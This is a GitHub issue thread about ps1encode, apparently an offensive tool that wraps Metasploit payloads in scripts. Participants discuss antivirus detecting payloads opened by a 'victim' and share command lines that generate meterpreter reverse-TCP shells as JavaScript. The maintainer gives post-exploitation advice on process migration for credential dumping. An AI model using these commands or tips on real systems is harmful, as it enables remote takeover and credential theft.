ps1encode icon indicating copy to clipboard operation
ps1encode copied to clipboard

Published 20 hours ago verified publisher icon CroweCybersecurity

Good but Gets detected....

Open complexpotato opened this issue 7 years ago • 3 comments

This really should not be an issue but I am just posting this to let other people know... ps1encode is really good, it does not get caught until the victim opens the file, but it gets caught because the anti virus saw it doing a Evo-Gen activity.

complexpotato avatar Jan 02 '18 18:01 complexpotato

--PAYLOAD windows/x64/meterpreter/reverse_tcp --ENCODE cmd -t js > x64shell.js Error: The selected arch is incompatible with the payload 。。 why?

BeingEasy avatar Jul 07 '19 10:07 BeingEasy

Hey @BeingEasy when selecting your encoder, switch --ENCODE is same as -t. The tool as of now does not support native x64 shells, but generating standard x86 payload will work on 64bit systems. If you need native architecture meterpreter for credential dumping purposes, I suggest using "migrate" command to hook into x64 process post exploit.

Try this: 。。 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE js > x86-64shell.js

addenial avatar Jul 08 '19 18:07 addenial

@BeingEasy added x64 support https://github.com/addenial/ps1encode/commit/a52cb04a4720147f82d5615745b19f2eb1660855

addenial avatar Jul 17 '19 23:07 addenial